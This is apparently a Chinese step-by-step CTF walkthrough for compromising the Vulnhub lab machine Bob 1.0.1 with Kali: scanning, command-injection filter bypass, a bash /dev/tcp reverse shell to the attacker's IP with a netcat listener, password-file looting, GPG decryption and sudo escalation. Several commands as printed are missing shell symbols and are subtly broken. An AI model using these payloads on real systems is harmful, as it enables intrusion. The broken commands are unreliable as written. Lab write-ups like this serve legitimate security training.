保姆级教程：手把手带你用Kali渗透Vulnhub靶机Bob 1.0.1（附完整命令与排错）

Kali渗透实战Vulnhub靶机Bob 1.0.1全流程解析第一次接触Vulnhub靶机时那种既兴奋又忐忑的心情至今记忆犹新。Bob 1.0.1作为经典的入门级靶机完美融合了基础渗透技巧与趣味性挑战。不同于枯燥的理论学习这次我们将通过真实环境演练从信息收集到权限提升一步步揭开这台靶机的安全防线。1. 环境搭建与初始配置在开始渗透之前确保你的实验环境正确搭建是成功的第一步。我建议使用VMware Workstation Pro 16版本它能提供更稳定的虚拟化支持。将Kali攻击机和Bob靶机都设置为NAT网络模式这种模式下两台虚拟机会自动分配同网段IP省去手动配置的麻烦。注意如果遇到网络连接问题首先检查VMware的虚拟网络编辑器确保NAT模式已启用DHCP服务。启动靶机后我们需要确认它的IP地址。这里有个实用技巧在Kali终端输入以下命令快速扫描存活主机arp-scan -l --interfaceeth0这个命令比常规的ifconfig更高效它能直接显示当前网段所有活跃设备。在我的测试环境中Kali本机IP是192.168.109.128而靶机显示为192.168.109.172。如果结果不符合预期可以尝试检查虚拟机网络适配器是否连接重启靶机网络服务service networking restart在靶机控制台直接输入ip a查看实际IP2. 深度信息收集策略2.1 端口扫描的艺术Nmap是渗透测试者的瑞士军刀但对新手来说复杂的参数组合往往令人困惑。针对Bob靶机我推荐使用这个经过优化的扫描命令nmap -sV -sC -p- -T4 -oN bob_scan.txt 192.168.109.172参数解析-sV探测服务版本-sC运行默认脚本检测-p-扫描所有65535个端口-T4加快扫描速度-oN将结果保存到文件扫描结果显示三个开放端口端口号服务备注21FTP匿名登录可能80HTTP网站入口25468SSH非标准端口2.2 Web应用漏洞挖掘访问80端口呈现的是一个学校官网表面看似平常但渗透测试师的眼睛总能发现异常。在news.html页面显示网站被黑了的提示这通常是管理员故意留下的线索。我习惯性按下CtrlU查看源码虽然没有直接发现漏洞但注意到几个关键点页面引用了jQuery 1.4.2存在已知漏洞的旧版本表单提交未使用CSRF令牌注释中包含疑似测试账号!-- test:test123 --使用Dirb进行目录扫描时添加-X .php,.html参数可以显著提高效率dirb http://192.168.109.172 -X .php,.html -w /usr/share/wordlists/dirb/common.txt扫描结果中dev_shell.php格外引人注目。这个看似简单的命令执行接口实际上暗藏玄机。3. 漏洞利用与突破3.1 命令注入的巧妙绕过直接输入whoami等基础命令毫无反应这是典型的输入过滤场景。经过多次测试发现以下字符组合可以绕过防护pwdecho payload | bash这种利用方式的关键在于pwd作为无害命令通过初步检测符号实现命令拼接管道符|将输出传递给bash执行反弹shell的经典命令需要稍作调整才能生效pwdecho bash -i /dev/tcp/192.168.109.128/4444 01 | bash在Kali端使用Netcat监听时建议添加-vnlp参数增强稳定性nc -vnlp 4444提示如果反弹失败尝试将bash替换为sh或者使用Python版本的反弹命令。3.2 权限提升的曲折之路获取初始shell后常规的sudo -l检查显示没有可用命令这迫使我们需要深入挖掘。在/home目录发现四个用户账户bobjcsebelloit每个用户的家目录都藏着关键线索bob目录发现.old_passwordfile.html - 包含jc和seb的密码 Documents/staff.txt - 暗示FTP后门 Documents/secret.gpg - 需要解密的密钥文件elliot目录线索theadminisdumb.txt - 藏头诗密钥提示GPG解密过程遇到权限问题时切换到jc用户是关键转折点su jc 输入从.old_passwordfile.html获取的密码 gpg --decrypt secret.gpg当系统提示输入密码时藏头诗给出的密钥HARPOCRATES成功解锁了bob的密码。这个设计精巧的谜题展示了CTF靶机的典型风格。4. 终极提权与技巧总结获得bob账户后sudo -l显示这个用户拥有所有命令的执行权限这简直是圣诞礼物但直接执行sudo -i时却遇到shell环境问题这时需要灵活切换解释器python -c import pty; pty.spawn(/bin/bash) sudo -i最终在/root目录找到flag文件时建议使用cat和less交替尝试某些特殊字符可能导致显示异常。以下是本次渗透的核心要点总结信息收集要全面不要忽略任何开放端口网页源码和注释常藏线索非常规端口可能更重要漏洞利用需耐心命令注入尝试多种绕过方式反弹shell多备几种payload注意特殊字符的URL编码权限提升靠细节检查所有用户目录的隐藏文件关注.suid特殊权限文件文档内容要逐字分析实际渗透中我遇到最棘手的问题是GPG解密时的权限错误后来发现必须切换到文件属主用户才能操作。这种细节点往往容易被教程忽略却正是新手最容易卡壳的地方。